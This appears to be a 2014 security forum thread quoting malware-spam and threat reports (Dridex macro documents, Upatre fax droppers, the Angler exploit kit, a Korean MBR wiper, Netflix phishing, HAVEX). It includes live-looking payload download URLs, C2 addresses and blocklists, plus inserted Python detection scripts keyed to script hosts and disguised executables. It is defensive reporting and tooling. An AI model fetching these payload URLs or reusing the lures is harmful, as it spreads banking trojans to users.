:fear: :mad:
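Added example (not code from any of the blogs quoted in this thread): a defender-side triage check for the two attachment tricks these posts keep describing, the ".doc" that is really an OOXML (ZIP) container carrying a VBA macro project (the 17 and 19 Dec 'Blocked ACH' posts) and the ".exe" shipped inside a zip with a document-style name and spoofed icon (the JPMorgan, Internet Fax and FedEx posts). Every attachment below is a constructed stand-in named after the reports, not a real sample; the function names and the EXPECTED_KIND table are assumptions of this example. It does not look inside OLE2 (Word 97-2003) files for macros, which needs a CFB parser.

```python
import io
import zipfile
from pathlib import PurePosixPath

# File signatures for the container types the quoted reports mention.
OLE_CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # Word/Excel 97-2003 (OLE2 compound file)
ZIP_MAGIC = b"PK\x03\x04"                            # OOXML (.docx/.xlsx) and plain .zip
PE_MAGIC = b"MZ"                                     # Windows PE executable
PDF_MAGIC = b"%PDF-"

# Container each extension is expected to carry (assumed table); anything else is a mismatch.
EXPECTED_KIND = {
    ".doc": "ole2", ".xls": "ole2",
    ".docx": "zip", ".xlsx": "zip", ".zip": "zip",
    ".pdf": "pdf", ".exe": "pe",
}
DOCUMENT_HINTS = ("pdf", "doc", "xls", "jpg", "txt")  # tokens a disguised .exe name tends to carry
MAX_MEMBER_BYTES = 1 << 20                            # cap per archive member (zip-bomb guard)


def sniff(data: bytes) -> str:
    """Classify content by its leading bytes, ignoring the file name entirely."""
    if data.startswith(OLE_CFB_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.startswith(PE_MAGIC):
        return "pe"
    if data.startswith(PDF_MAGIC):
        return "pdf"
    return "unknown"


def zip_members(data: bytes):
    """Yield (member name, capped member bytes); yields nothing for a corrupt archive."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                with zf.open(info) as fh:
                    yield info.filename, fh.read(MAX_MEMBER_BYTES)
    except zipfile.BadZipFile:
        return


def triage(filename: str, data: bytes) -> list:
    """Return human-readable findings for one attachment; an empty list means nothing stood out."""
    findings = []
    path = PurePosixPath(filename)
    ext, stem = path.suffix.lower(), path.stem.lower()
    kind = sniff(data)

    expected = EXPECTED_KIND.get(ext)
    if expected and kind != expected:
        # e.g. "ACH transaction 3360.doc" whose bytes are an OOXML ZIP, not an OLE2 .doc
        findings.append(f"extension {ext} but content is {kind}")

    if kind == "pe":
        findings.append("windows executable")
        if any(hint in stem for hint in DOCUMENT_HINTS):
            # fax8642174_pdf.exe style: the name (and spoofed icon) imitates a document
            findings.append("executable named to look like a document")

    if kind == "zip":
        names = []
        for name, blob in zip_members(data):
            names.append(name.lower())
            # Recurse so an .exe inside notification.zip / message_zdm.zip is judged on its own bytes.
            findings.extend(f"{name}: {f}" for f in triage(name, blob))
        if any(n.endswith("vbaproject.bin") for n in names):
            findings.append("OOXML document carries a VBA macro project")
    return findings


def _ooxml(with_macro: bool) -> bytes:
    """Constructed minimal OOXML container (not a real Word file) for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", OLE_CFB_MAGIC + b"\x00" * 8)  # stand-in, not real VBA
    return buf.getvalue()


def _zip_with_exe(member: str) -> bytes:
    """Constructed zip holding a stub that only carries the PE signature."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member, PE_MAGIC + b"\x00" * 62)
    return buf.getvalue()


# Constructed stand-ins named after attachments in the reports above.
SAMPLES = {
    "ACH transaction 3360.doc": _ooxml(with_macro=True),    # .doc that is really macro-bearing OOXML
    "report.docx": _ooxml(with_macro=False),                # benign control
    "invoice.doc": OLE_CFB_MAGIC + b"\x00" * 24,            # genuine OLE2 .doc header, no findings
    "fax8642174_pdf.zip": _zip_with_exe("fax8642174_pdf.exe"),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, "->", triage(name, blob) or ["clean"])
```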
AplusWebMaster
2014-12-22, 19:41
FYI...
Angler EK on 193.109.69.59
- http://blog.dynamoo.com/2014/12/angler-ek-on-1931096959.html
22 Dec 2014 - "193.109.69.59 (Mir Telematiki Ltd, Russia) is hosting what appears to be the Angler Exploit Kit... infection chain... The last step is where the badness happens, hosted on 193.109.69.59 (Mir Telematiki Ltd, Russia) which is also being used to host the following malicious domains:
qwe.holidayspeedsix .biz
qwe.holidayspeedfive .biz
qwe.holidayspeedseven .biz
A quick look at the contents of 193.109.68.0/23 shows some other questionable sites. A look at the sites hosted* in this /23 indicates that most of them appear to be selling counterfeit goods, so -blocking- the entire /23 will probably be no great loss.
Recommended -minimum- blocklist:
193.109.69.59
holidayspeedsix .biz
holidayspeedfive .biz
holidayspeedseven .biz "
* http://www.dynamoo.com/files/mmuskatov.csv
193.109.69.59: https://www.virustotal.com/en/ip-address/193.109.69.59/information/
___
Fake 'Tiket alert' SPAM
- http://blog.dynamoo.com/2014/12/tiket-alert-spam-tiket-really.html
22 Dec 2014 - "Sometimes the spammers don't really try very hard. Like they have to make a quota or something. A "Tiket alert" from the FBI.. or is it FBR? Really?
From: FBR service [jon.wo@ fbi .com]
Date: 22 December 2014 at 18:29
Subject: Tiket alert
Look at the link file for more information.
http <redacted>
Assistant Vice President, FBR service
Management Corporation
I have seen another version of this where the download location is negociomega .com/ticket/fsb.html. Clicking on the link downloads a file ticket8724_pdf.zip which in turn contains a malicious executable ticket8724_pdf.exe. This has a VirusTotal detection rate of 2/54*. Between that VirusTotal analysis and the Anubis analysis we can see that the malware attempts to phone home to:
http ://202.153.35.133 :42463/2212us12//0/51-SP3/0/
http ://202.153.35.133 :42463/2212us12//1/0/0/
http ://moorfuse .com/images/unk12.pne
202.153.35.133 is Excell Media Pvt Ltd, India.
Recommended blocklist:
202.153.35.133
moorfuse .com
mitsuba-kenya .com
negociomega .com "
* https://www.virustotal.com/en/file/131855bdd2832705bf8c90f30efd43a22956ca86bab19f3a9941158fd33291af/analysis/1419277515/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
188.132.231.115: https://www.virustotal.com/en/ip-address/188.132.231.115/information/
___
Fake 'Employee Documents' Fax SPAM
- http://blog.mxlab.eu/2014/12/19/email-employee-documents-internal-use-from-no-replaymy-fax-com-leads-to-malicious-zip-file/
Dec 19, 2014 - "... intercepted quite a large distribution campaign by email with the subject “Employee Documents – Internal Use”, this email is sent from the spoofed address “Fax <no-replay@ my-fax .com>” and has the following body:
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: ... <redacted>
Documents are encrypted in transit and store in a secure repository ...
The downloaded file fax8127480_924_pdf.zip contains the 26 kB large file fax8127480_924.exe. The trojan is known as W32/Trojan.HZAT-8029, W32/Trojan3.MYF, Downloader-FSH!FFA9EE754457, Upatre.FH or a variant of Win32/Kryptik.CTMJ... Virus Total*..."
* https://www.virustotal.com/en/file/99b5c743e203cf0fd5be7699124668be35012aaa51233742f2cd979ab43a5dcb/analysis/
File name: fax8127480_924.exe
Detection ratio: 26/53
Analysis date: 2014-12-22
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
174.127.104.112: https://www.virustotal.com/en/ip-address/174.127.104.112/information/
83.166.234.251: https://www.virustotal.com/en/ip-address/83.166.234.251/information/
23.10.252.26: https://www.virustotal.com/en/ip-address/23.10.252.26/information/
50.7.247.42: https://www.virustotal.com/en/ip-address/50.7.247.42/information/
217.172.180.178: https://www.virustotal.com/en/ip-address/217.172.180.178/information/
UDP communications
173.194.71.127: https://www.virustotal.com/en/ip-address/173.194.71.127/information/
:fear::fear: :mad:
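The attachments in the posts above (notification.zip, ticket8724_pdf.zip, fax8127480_924_pdf.zip) all follow one pattern: a zip whose member is a .exe named to read as a document once Windows hides the extension. As an added example, not code from any of the quoted blogs, the script below inspects a zip in memory and flags members by executable extension, by PE magic behind a non-executable extension, by a document hint such as "_pdf" before the real extension, and by the long digit runs used to push the extension out of view. The sample zip and the stub "MZ" payloads are constructed for the demo.

```python
# Added example (not from any of the quoted posts): inspect a mail attachment
# zip for executables dressed up as documents, the pattern of notification.zip,
# ticket8724_pdf.zip and fax8127480_924_pdf.zip described above.
import io
import re
import zipfile

# What Windows runs on double-click. The attachments above all extract to .exe,
# which the default "hide extensions for known file types" setting masks.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
# "ticket8724_pdf.exe" reads as a PDF once ".exe" is hidden.
DOC_HINT = re.compile(r"(^|[_.\-])(pdf|doc|docx|xls|xlsx|txt)$")
# "notification_48957348759483759834759834758934798537498.exe": a digit run this
# long pushes the real extension out of view in Explorer's name column.
LONG_DIGITS = re.compile(r"\d{20,}")


def split_ext(name):
    """Lower-cased (stem, ext) of the base name, ext including the dot."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if "." not in base:
        return base, ""
    stem, ext = base.rsplit(".", 1)
    return stem, "." + ext


def classify_member(name, head):
    """Reasons a zip member looks like a disguised executable (empty = clean)."""
    stem, ext = split_ext(name)
    reasons = []
    is_exec_ext = ext in EXECUTABLE_EXTS
    is_pe = head.startswith(b"MZ")  # DOS/PE magic, regardless of the name
    if is_exec_ext:
        reasons.append("executable extension " + ext)
    if is_pe and not is_exec_ext:
        reasons.append("PE (MZ) content behind non-executable extension " + (ext or "(none)"))
    if is_exec_ext and DOC_HINT.search(stem):
        reasons.append("document name hint before executable extension")
    if LONG_DIGITS.search(stem):
        reasons.append("long digit run in file name")
    return reasons


def scan_zip(data):
    """Map each member of a zip (given as bytes) to its list of reasons."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)  # only the magic bytes are needed
            findings[info.filename] = classify_member(info.filename, head)
    return findings


def build_sample_zip():
    """Constructed sample: three disguised payloads and one clean file."""
    fake_pe = b"MZ" + b"\x00" * 62  # stub PE header, constructed for the demo
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ticket8724_pdf.exe", fake_pe)
        zf.writestr("notification_48957348759483759834759834758934798537498.exe", fake_pe)
        zf.writestr("invoice.pdf", fake_pe)  # document extension, PE inside
        zf.writestr("readme.txt", b"plain text, nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()).items():
        print(("FLAG " if reasons else "ok   ") + member, "; ".join(reasons))
```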
AplusWebMaster
2014-12-23, 15:33
FYI...
Fake 'Remittance Advice' SPAM - malicious Excel attachment
- http://blog.dynamoo.com/2014/12/remittance-advice-spam-comes-with.html
23 Dec 2014 - "This -fake- remittance advice comes with a malicious Excel attachment.
From: Whitney
Date: 23 December 2014 at 09:12
Subject: Remittance Advice -DPRC93
Confidentiality and Disclaimer: This email and its attachments are intended for the addressee only and may be confidential or the subject of legal privilege.
If this email and its attachments have come to you in error you must take no action based on them, nor must you copy them, distribute them or show them to anyone.
Please contact the sender to notify them of the error...
The reference in the subject varies, and the name of the attachment always matches (so in this case DPRC93.xls). There are in fact three different versions of the document, all of which have a malicious macro. At the moment, none of these are detected by anti-virus vendors [1] [2] [3]... the macro has now changed completely, as it now loads some of the data from the Excel spreadsheet itself and puts it into a file %TEMP%\windows.vbs. So far I have seen three different scripts... which download a component from one of the following locations:
http ://185.48.56.133:8080/sstat/lldvs.php
http ://95.163.121.27:8080/sstat/lldvs.php
http ://92.63.88.100:8080/sstat/lldvs.php
It appears that this email is downloaded as test.exe and is then saved as %TEMP%\servics.exe. The ThreatExpert report shows traffic to the following:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer AG, Germany)
VirusTotal indicates a detection rate of just 3/54*, and identifies it as Dridex.
Recommended blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
185.48.56.133
95.163.121.27
92.63.88.100
92.63.88.106
Note that there are two IPs acting as downloaders in the 92.63.88.0/24 range (MWTV, Latvia). It may be that you would also want to block that range as well."
1] https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419330172/
2] https://www.virustotal.com/en/file/87bb64f9e759f93b0b47c1c8af917c5a11d66221fe146bbbc26373560c96a0fe/analysis/1419330170/
3] https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419330172/
* https://www.virustotal.com/en/file/a9239d875ecd1dbf4d83e1112c07c49b99b2594262b6a57e0eaa0518390d5ffb/analysis/1419333104/
- http://myonlinesecurity.co.uk/remittance-advice-pzdf16-excel-xls-malware/
23 Dec 2014
> 22 Dec 2014 : PZDF16.xls Current Virus total detections: 0/55*:
TKBJ98.xls Current Virus total detections: 0/55**
* https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419328785/
** https://www.virustotal.com/en/file/e78fb465f9767ae897dd928714f2a329987e765259f5f66275128aa2d44ee6b5/analysis/1419329398/
- http://blog.mxlab.eu/2014/12/23/email-remittance-advice-lcdq26-contains-excel-file-with-malicious-macro/
Dec 23 2014
> https://www.virustotal.com/en/file/e78fb465f9767ae897dd928714f2a329987e765259f5f66275128aa2d44ee6b5/analysis/
___
Fake 'CHRISTMAS OFFERS.docx' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/jayne-route2fitness-co-uk-christmas-offers-docx-word-doc-malware/
23 Dec 2014 - "'CHRISTMAS OFFERS.docx' pretending to come from Jayne <Jayne@ route2fitness .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email body is completely -blank- . As per usual there are at least 2 different file sizes of this malware although all are named exactly the same.
22 Dec 2014: CHRISTMAS OFFERS.doc (41 kb) . Current Virus total detections: 0/55* : CHRISTMAS OFFERS.doc (44 kb) . Current Virus total detections: 0/56**
Downloads dridex Trojan from microinvent .com//js/bin.exe which is moved to and run from %temp%1\V2MUY2XWYSFXQ.exe Virus total*** ..."
* https://www.virustotal.com/en/file/0c45d7f517f1086528576c5b696303b792c29244dc0a4421f3720ed84a521b2e/analysis/1419327481/
** https://www.virustotal.com/en/file/211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c/analysis/1419327349/
*** https://www.virustotal.com/en/file/de25222783cdcbe20ca8d8d9a531f150387260e5297f672474141227eeff7773/analysis/1419334606/
- http://blog.mxlab.eu/2014/12/23/empty-email-with-attached-word-file-christmas-offers-docx-contains-malicious-macro/
Dec 23, 2014
> https://www.virustotal.com/en/file/211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c/analysis/
___
Network Time Protocol Vulnerabilities
- https://ics-cert.us-cert.gov//advisories/ICSA-14-353-01
Dec 22, 2014 - "... vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are publicly available. Products using NTP service prior to NTP-4.2.8 are affected. No specific vendor is specified because this is an open source protocol.
IMPACT: Exploitation of these vulnerabilities could allow an attacker to execute arbitrary code with the privileges of the ntpd process..."
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9295 - 7.5 (HIGH)
- http://arstechnica.com/security/2014/12/attack-code-exploiting-critical-bugs-in-net-time-sync-puts-servers-at-risk/
Dec 19 2014
:fear::fear: :mad:
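The 'Remittance Advice' and 'CHRISTMAS OFFERS' reports above describe the same chain: an Office macro writes %TEMP%\windows.vbs, a script host runs it, and the download lands in %TEMP% under a name like servics.exe, one letter short of services.exe. As an added example, not code from the quoted blogs, the detector below applies those observations to constructed Sysmon-style process and file events; the event format, the look-alike name list and the sample log are assumptions made for the demo.

```python
# Added example (not from the quoted posts): detection logic for the macro
# chain described above (Office writes %TEMP%\windows.vbs, a script host runs
# it, the download lands as %TEMP%\servics.exe), run over constructed events.
import re

OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".ps1", ".hta")
# Names a dropper may imitate by dropping or swapping one character
# ("servics.exe" vs services.exe, or the wiper's PcaSvcc vs PcaSvc above).
LEGIT_NAMES = ["services.exe", "svchost.exe", "lsass.exe", "csrss.exe",
               "winlogon.exe", "explorer.exe", "pcasvc", "wuauserv", "bits"]
TEMP_RE = re.compile(r"(%temp%|\\appdata\\local\\temp)\\", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_temp(path):
    return bool(TEMP_RE.search(path))


def edit_distance(a, b):
    """Levenshtein distance, used for the look-alike name check."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(name):
    """Legitimate name this one is exactly one edit away from, else None."""
    stem = name.rsplit(".", 1)[0]
    for legit in LEGIT_NAMES:
        lstem = legit.rsplit(".", 1)[0]
        if name != legit and stem != lstem and edit_distance(stem, lstem) == 1:
            return legit
    return None


def check_event(ev):
    """Return alert strings for one constructed Sysmon-style event dict."""
    alerts = []
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parent", ""))
    if ev["type"] == "file_create":
        target = ev["target"]
        tname = basename(target)
        if image in OFFICE and in_temp(target) and tname.endswith(SCRIPT_EXTS):
            alerts.append(f"{image} wrote script {tname} to TEMP (macro dropper)")
        if in_temp(target) and tname.endswith(".exe"):
            alerts.append(f"executable {tname} written to TEMP")
        legit = lookalike(tname)
        if legit:
            alerts.append(f"{tname} imitates {legit}")
    elif ev["type"] == "process_create":
        cmd = ev.get("cmdline", "")
        if image in SCRIPT_HOSTS and in_temp(cmd):
            alerts.append(f"{image} running a script from TEMP: {cmd}")
        if parent in OFFICE and image in SCRIPT_HOSTS:
            alerts.append(f"{parent} spawned {image}")
        if in_temp(ev.get("image", "")):
            alerts.append(f"process started from TEMP: {image}")
        legit = lookalike(image)
        if legit:
            alerts.append(f"{image} imitates {legit}")
    return alerts


# Constructed event log reproducing the chain in the reports above.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Program Files\Microsoft Office\excel.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'excel.exe "C:\Users\u\Downloads\DPRC93.xls"'},
    {"type": "file_create", "image": r"C:\Program Files\Microsoft Office\excel.exe",
     "target": r"C:\Users\u\AppData\Local\Temp\windows.vbs"},
    {"type": "process_create", "image": r"C:\Windows\System32\wscript.exe",
     "parent": r"C:\Program Files\Microsoft Office\excel.exe",
     "cmdline": r'wscript.exe "C:\Users\u\AppData\Local\Temp\windows.vbs"'},
    {"type": "file_create", "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\u\AppData\Local\Temp\servics.exe"},
    {"type": "process_create", "image": r"C:\Users\u\AppData\Local\Temp\servics.exe",
     "parent": r"C:\Windows\System32\wscript.exe", "cmdline": "servics.exe"},
    {"type": "file_create", "image": r"C:\Windows\System32\notepad.exe",
     "target": r"C:\Users\u\Documents\notes.txt"},  # benign control event
]


def run(events):
    """Alerts per event index; benign events map to an empty list."""
    return {i: check_event(ev) for i, ev in enumerate(events)}


if __name__ == "__main__":
    for i, alerts in run(SAMPLE_EVENTS).items():
        for a in alerts:
            print(f"event {i}: {a}")
```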
AplusWebMaster
2014-12-24, 10:51
FYI...
MBR Wiper attacks strike Korean Power Plant
- http://blog.trendmicro.com/trendlabs-security-intelligence/mbr-wiper-attacks-strike-korean-power-plant/
Dec 23, 2014 - "In recent weeks, a major Korean electric utility has been affected by destructive malware, which was designed to wipe the master boot records (MBRs) of affected systems. It is believed that this MBR wiper arrived at the target systems in part via a vulnerability in the Hangul Word Processor (HWP), a commonly used application in South Korea. A variety of social engineering lures were used to get would-be victims to open these files. Below is a quick overview of the attack with the infection chain starting from a spearphishing email sent to the employees’ inboxes:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/Infection-chain_MBR-wiper3.png
We detect the malware as TROJ_WHAIM.A*, which is a fairly straightforward MBR wiper. In addition to the MBR, it also overwrites files that are of specific types on the affected system. It installs itself as a service on affected machines to ensure that it will run whenever the system is restarted... it uses file names, service names, and descriptions of actual legitimate Windows services. This ensures that a cursory examination of a system’s services may not find anything malicious, helping this threat -evade- detection... This particular MBR-wiping behavior, while uncommon, has been seen before. We observed these routines in March 2013 when several attacks hit various South Korean government agencies resulting in major disruptions to their operations. The malware involved in this attack overwrote the MBR with a series of the words PRINCPES, HASTATI, or PR!NCPES. The recent attack on Sony Pictures also exhibited a similar MBR-wiping capability. There are also similarities to the previous MBR wiper attacks as well. All three attacks mentioned earlier overwrite the MBR with certain repeated strings... These attacks highlight our findings about the destructive, MBR-wiping malware that appears to have become a part of the arsenal of several threat actors. This is a threat that system administrators will have to deal with, and not all targeted attack countermeasures will be effective. Techniques to mitigate the damage that these attacks cause should be considered as a part of defense-in-depth networks.
Update as of 11:29 P.M. PST, December 23, 2014
Upon further analysis, we confirmed that TROJ_WHAIM.A checks if the current date and time is Dec 10, 2014 11:00 AM or later. If it meets this condition, it sets the registry, HKEY_LOCAL_MACHINE\SOFTWARE\PcaSvcc\finish to 1, thus triggering the MBR infection. Otherwise, it sleeps for a minute and checks the system time again. Aside from the MBR infection capabilities and overwriting certain strings, another similarity of this attack to the March 2013 incident is its ‘time bomb’ routine. A certain action is set in motion once the indicated date/time by the attackers is reached by the infected system."
* http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_whaim.a
"To restore your system's Master Boot Record (MBR)..."
South Korea seeks China's cooperation in probe into cyberattack on nuclear operator
- http://www.reuters.com/article/2014/12/24/us-northkorea-cybersecurity-nuclear-idUSKBN0K20DT20141224
Dec 24, 2014 - "... Connections to South Korean virtual private networks (VPNs) used in the cyberattacks were traced to multiple IP addresses in China's Shenyang city, located in a province which borders North Korea..."
Japan, wary of North Korea, works to secure infrastructure after Sony attack
- http://www.reuters.com/article/2014/12/24/us-northkorea-cyberattack-japan-idUSKBN0K20IX20141224
Dec 24, 2014 - "Japan, fearing it could be a soft target for possible North Korean cyberattacks in the escalating row over the Sony Pictures hack, has begun working to ensure basic infrastructure is safe and to formulate its diplomatic response, officials said... The government's National Information Security Center, working through various ministries, is pressing companies to improve their security from cyberattacks..."
Attack maps: http://map.ipviking.com/
___
Fake 'Signature Invoice' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/malware-spam-rhianna-wellings.html
24 Dec 2014 - "Teckentrup Depot UK is a legitimate UK company, but these emails are -not- from Teckentrup Depot and they contain a malicious attachment. Teckentrup Depot has not been hacked, their database has not been compromised, and they are -not- responsible for this in any way.
From: Rhianna Wellings [Rhianna@ teckentrupdepot .co.uk]
Date: 24 December 2014 at 07:54
Subject: Signature Invoice 44281
Your report is attached in DOC format.
To load the report, you will need the Microsoft® Word® reader...
Attached is a malicious Word document called Signature Invoice.doc which comes in two different versions, both of which are undetected by AV vendors [1] [2]. Each one contains a different macro... which then downloads an additional component from one of these two locations:
http ://Lichtblick-tiere .de/js/bin.exe
http ://sunfung .hk/js/bin.exe
The file is saved into the location %TEMP%\1V2MUY2XWYSFXQ.exe and currently has a VirusTotal detection rate of just 4/56*. The ThreatExpert report shows traffic to the following IPs:
74.208.11.204 (1&1 Internet, US)
81.169.156.5 (Strato AG, Germany)
59.148.196.153 (HKBN, Hong Kong)
According to the Malwr report it also drops a malicious DLL with a detection rate of 24/56**, detected as the Dridex banking trojan.
Recommended blocklist:
74.208.11.204
81.169.156.5
59.148.196.153
lichtblick-tiere .de
sunfung .hk "
1] https://www.virustotal.com/en/file/4d7c6a2e9e5b963470cae32ce12f47a608c9477ec7d4b07861f639d15ff35a38/analysis/1419412603/
2] https://www.virustotal.com/en/file/5dc552dabde0e6bd70ed1765d1a8c7cd394a6fc2c32519f529ae619f73739fd6/analysis/1419412612/
* https://www.virustotal.com/en/file/1f56a9ae1984cc1c9435609c0c63845fe0eebaa025fd24387829d280e7dfafcc/analysis/1419413157/
** https://www.virustotal.com/en/file/f259feff8c187b51dabb766491df61c8f0de1345427b337536c2ee4550ac937d/analysis/1419417434/
- http://myonlinesecurity.co.uk/rhianna-wellings-teckentrupdepot-co-uk-signature-invoice-44281-word-doc-malware/
24 Dec 2014 : Signature Invoice.doc . Current Virus total detections: 0/56*: 0/56**
* https://www.virustotal.com/en/file/4d7c6a2e9e5b963470cae32ce12f47a608c9477ec7d4b07861f639d15ff35a38/analysis/1419409093/
** https://www.virustotal.com/en/file/5dc552dabde0e6bd70ed1765d1a8c7cd394a6fc2c32519f529ae619f73739fd6/analysis/1419409548/
___
Fake Christmas offers infect PCs with banking Trojan
- https://blog.malwarebytes.org/fraud-scam/2014/12/santas-fake-christmas-offers-infect-pcs-with-banking-trojan/
Dec 24, 2014 - "... The email is accompanied by a Word document with a catchy name: CHRISTMAS OFFERS.docx:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/xmas_message.png
... the document is blank and requires the user to enable macros in order to view it. By default Microsoft Office disables macros, a handy automation feature but also a huge security risk. This is where the social engineering lies and the crooks are counting on people so eager to see the promised content that they will push the button and get infected. Macros enable you to create scripts that automate repetitive tasks within a document, for example copying content from one page and pasting it with a different font and color on another. At the same time, a macro can be used to perform a malicious action, which happens to be the case here.
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/word_doc.png
... What happens if you were to trust the document? A remote file is downloaded from
hxxp ://jasoncurtis .co.uk/js/bin.exe and ran from the temp folder... It is known as Dridex, a banking Trojan... Macro malware often relies on social engineering to convince the mark to open a file and disable the default protection. It is not terribly sophisticated but yet it has seen a bit of a revival in recent months with -spam- being the preferred delivery method. The best protection against these types of threats is to be particularly cautious before opening attachments, even if they are ‘classic’ Microsoft Office documents... This holiday season, whether you believe in Santa or not, please be extra cautious with offers that sound too good to be true. The bad guys like to make believe, but we’d rather leave them empty handed or send them off with a lump of coal."
___
Fake 'Postal Notification' SPAM - malicious notification.exe
- http://blog.mxlab.eu/2014/12/24/fake-postal-notification-service-emails-from-fedex-download-malicious-notification-exe/
Dec 24, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Postal Notification Service”. This email is sent from the spoofed address “”Fedex >” <voyeuristicxd@ jackpowerspiritbind .us>” and has the following body:
Screenshot: http://img.blog.mxlab.eu/2014/20141224_fedex.gif
The embedded URL, in our sample hxxp ://appimmobilier .com/notification.exe, will download the 58 kB large file notification.exe. The trojan is known as Win32/TrojanDownloader.Wauchos.AF, UDS:DangerousObject.Multi.Generic or Win32.Trojan.Inject.Auto. At the time of writing, 3 of the 56 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/de425462f1fb95c91edd01ded9337869053c4a09f11c9bec830c542fc5720be8/analysis/
:fear::fear: :mad:
AplusWebMaster
2014-12-29, 16:05
FYI...
Phish - "Your Netflix Account Has Been Suspeded"
- http://blog.mxlab.eu/2014/12/29/phishing-email-your-netflix-account-has-been-suspeded/
Dec 29, 2014 - "... intercepted a phishing campaign by email with the subject “Your Netflix Account Has Been Suspeded [#654789]”. This email is sent from the spoofed address “”secure@ netflix .ssl .co.uk” <secure@ netflix .ssl .co.uk>” and has the following body:
Screenshot: http://img.blog.mxlab.eu/2014/20141229_netflix_1.gif
In our sample, the URL takes us to the phishing site located at hxxp ://netflix-validation- uk .co .uk/~netflix/authcode.22e2839f6ea44972845f1e0b02f397ba/email_identifier=71a605276e146b93e52b0c1bfb98ade285c337b0a6b7e5f3f560fd5bb11f1d1c/d0446fac4ba6feceb507af17e1b0bca8/Login.php
This shows us an identical copy of the official Netflix login page. Screenshot of the member login form on the phishing web site:
> http://img.blog.mxlab.eu/2014/20141229_netflix_2.gif
After submitting the login and password, the phishing process begins by asking to fill in our billing information.
> http://img.blog.mxlab.eu/2014/20141229_netflix_3.gif
Followed by filling in our credit card details:
> http://img.blog.mxlab.eu/2014/20141229_netflix_4.gif
Our account seems to be updated and we can continue:
> http://img.blog.mxlab.eu/2014/20141229_netflix_5.gif
... straight to the official Netflix login site:
> http://img.blog.mxlab.eu/2014/20141229_netflix_6.gif "
___
64-bit Version of HAVEX seen - ICS
- http://blog.trendmicro.com/trendlabs-security-intelligence/64-bit-version-of-havex-spotted/
Dec 29, 2014 - "The remote access tool (RAT) HAVEX* became the focus of the security industry after it was discovered to have played a major role in a campaign targeting industrial control systems (ICS). While observing HAVEX detections (known by different vendors as Dragonfly, Energetic Bear, and Crouching Yeti), we noticed something interesting. The Dragonfly campaign was previously believed to be compatible only with 32-bit versions, as most mission-critical systems would most likely run Windows XP, which has since been listed as end of support. In contrast, we came across two interesting infections running on Windows 7 systems. First 64-bit HAVEX Sighting: Based on our analysis (seen in the chain below), a file called TMPprovider023.dll, detected as BKDR64_HAVEX.A, was found, which creates several files in the file system. It should be noted that TMPprovider0<2-digit version number>.dll is a known indicator of HAVEX and is the component of this threat that interacts with the command-and-control (C&C) servers to perform downloads or receive execution commands associated with it.
> File installation chain: http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/64havex1.jpg
... we’re seeing three indicators of BKDR_HAVEX:
